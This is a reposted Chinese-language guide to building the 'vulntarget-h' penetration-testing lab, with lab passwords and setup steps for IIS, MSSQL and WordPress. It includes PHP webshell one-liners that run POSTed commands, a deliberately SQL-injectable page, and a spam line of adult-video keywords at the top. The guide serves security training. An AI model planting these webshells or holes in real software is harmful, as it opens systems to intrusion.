中文字幕理论片,69视频免费在线观看,亚洲成人app,国产1级毛片,刘涛最大尺度戏视频,欧美亚洲美女视频,2021韩国美女仙女屋vip视频

打開APP
userphoto
未登錄

開通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開通VIP

首頁(yè)

好書

留言交流

下載APP

聯(lián)系客服
vulntarget漏洞靶場(chǎng)系列(八)— vulntarget-h

vuntarget免責(zé)聲明
vulntarget靶場(chǎng)系列僅供安全專業(yè)人員練習(xí)滲透測(cè)試技術(shù),此靶場(chǎng)所提供的信息只為網(wǎng)絡(luò)安全人員對(duì)自己所負(fù)責(zé)的網(wǎng)站、服務(wù)器等(包括但不限于)進(jìn)行檢測(cè)或維護(hù)參考,未經(jīng)授權(quán)請(qǐng)勿利用靶場(chǎng)中的技術(shù)資料對(duì)任何計(jì)算機(jī)系統(tǒng)進(jìn)行入侵操作。利用此靶場(chǎng)所提供的信息而造成的直接或間接后果和損失,均由使用者本人負(fù)責(zé)。
vulntarget靶場(chǎng)系列擁有對(duì)此靶場(chǎng)系列的的修改、刪除和解釋權(quán)限,未經(jīng)授權(quán),不得用于其他。

00

相關(guān)漏洞技術(shù)


sql注入、文件包含、命令執(zhí)行,免殺等漏洞利用、隧道代理等

下載地址

百度云鏈接

https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q

提取碼:1p9p

其中vulntarget-h是本次環(huán)境

github地址:

https://github.com/crow821/vulntarget

測(cè)試說(shuō)明

1. 鏡像都是基于VM16做的,沒有向下兼容
2. 操作人員自行修改對(duì)應(yīng)IP
3. 下載靶機(jī),開機(jī)之后,確認(rèn)自己網(wǎng)絡(luò)配置好了,可以選擇本地做一個(gè)快照,原本的快照可能會(huì)因?yàn)橹谱靼袡C(jī)的處理器和當(dāng)前打開靶機(jī)的處理器不一致,導(dǎo)致快照恢復(fù)失敗,或者異常(見諒

拓?fù)鋱D

01

vulntarget-h賬密

windows10:mimataichangjibuzhu
windows7:mimataichangyebuhao
win2008: Winmimayijingwangjile@
sa:Adminweishenmezhegehaiyaomima@
wordpresss:root:zhehaiyaomima?
此環(huán)境全為windows系統(tǒng)

02

環(huán)境搭建

windows2008
1.windows 2008 mssql安裝

點(diǎn)擊確定



下一步->下一步->安裝->下一步->下一步


到這里全選繼續(xù)下一步->下一步->下一步


對(duì)所有用戶使用相同賬戶


輸入管理員賬號(hào)密碼

最后改成自動(dòng)


輸入sa密碼,添加administrator賬戶


添加賬號(hào)

然后一直下一步到安裝就好了

2.windows 2008 IIS安裝

控制面板->程序->打開關(guān)閉windows功能->角色->添加角色->下一步

勾選web服務(wù)器(IIS)



勾選上面這些功能->下一步->安裝,等待安裝完成
回到角色點(diǎn)開IIS服務(wù)


點(diǎn)擊網(wǎng)站右鍵選擇website
管理網(wǎng)站->高級(jí)設(shè)置


修改網(wǎng)站根目錄
不修改樂趣少一半,防止被攻擊者fuzz出來(lái)


直接滾鍵盤,再回到管理網(wǎng)站選擇重新啟動(dòng)

訪問ip地址看到這樣就可以了
接下來(lái)去這里找aspx注入的源碼
https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/SiteGenerator_ContentPages/Vulnerabilities/DataValidation_SqlInjection_Basic.aspx

下載下來(lái)后刪掉13行,修改47行的密碼

private static string strSqlConnectionString = @'SERVER=.;UID=sa;PWD=Adminweishenmezhegehaiyaomima@;DATABASE=FoundStone_Bank';
重命名文件后放入網(wǎng)站根目錄
如果放不進(jìn)去右鍵屬性安全為USER用戶加上修改權(quán)限

訪問頁(yè)面存在就可以了,這里肯定報(bào)錯(cuò)因?yàn)闆]配置數(shù)據(jù)庫(kù)
然后去修改首頁(yè),到前面修改網(wǎng)站根目錄的地方

點(diǎn)擊默認(rèn)文檔

添加index.aspx,這樣再次進(jìn)入網(wǎng)站就不需要輸index.aspx
到這里找到數(shù)據(jù)庫(kù)文件
https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/FoundStoneBank_export.sql

點(diǎn)擊數(shù)據(jù)庫(kù)右鍵新建數(shù)據(jù)庫(kù),創(chuàng)建一個(gè)名為FoundStone_Bank的數(shù)據(jù)庫(kù)


點(diǎn)擊新建查詢復(fù)制配置文件



最后回到首頁(yè)用參數(shù)測(cè)試一下


這樣就成功了

3.安裝360

這就不寫了

windows7
windows7就是一個(gè)windows無(wú)回顯的命令執(zhí)行,web目錄不可寫不出網(wǎng)
<?phphighlight_file(__FILE__);exec($_POST['shell']);//路過(guò)的腳本小子留下了一個(gè)后門,讀一下c:\phpstudy_pro\a.txt吧里面有好東西?>
將這個(gè)文件放入網(wǎng)站根目錄
再寫一個(gè)shell放到網(wǎng)站根目錄,這個(gè)名字取復(fù)雜一點(diǎn),不要被fuzz出來(lái)
開始滾鍵盤
dsuijaddjsfvos.php
<?phphighlight_file(__FILE__);eval($_POST['shell']);?>


設(shè)置網(wǎng)站目錄不可寫,幾個(gè)用戶都修改



安裝火絨

windows10
去官網(wǎng)下載wordpress最新版
用phpstudy安裝
創(chuàng)建一個(gè)wordpress數(shù)據(jù)庫(kù)


然后是常規(guī)的安裝


登錄后臺(tái)上傳有漏洞的插件,將網(wǎng)站源碼打包下來(lái)改名為www.zip
在組策略編輯->管理模板->網(wǎng)絡(luò)->Lanman工作
啟用不安全的來(lái)賓登錄
設(shè)置防火墻,禁止10.30.3.0/24的135,139,445出站
升級(jí)windows defender最新版
在phpstudy中關(guān)閉php的遠(yuǎn)程包含和遠(yuǎn)程文件
這樣就可以簡(jiǎn)簡(jiǎn)單單的把vulntarget-h制作完成了
本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊舉報(bào)。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
Redis未授權(quán)訪問漏洞復(fù)現(xiàn)與GETSHELL利用方法匯總(含靶場(chǎng)搭建)
從零開始學(xué)黑客新手入門
Windows2003服務(wù)器安裝及設(shè)置教程——軟件安裝與設(shè)置篇九
Microsoft Windows Server 2008 R2 IIS7.5安裝指南
計(jì)算機(jī)的系統(tǒng)安全論文
【2018 網(wǎng)絡(luò)空間安全答案】【混戰(zhàn)部分】2018年全國(guó)職業(yè)院校技能大賽中職組
更多類似文章 >>
生活服務(wù)
熱點(diǎn)新聞
分享 收藏 導(dǎo)長(zhǎng)圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服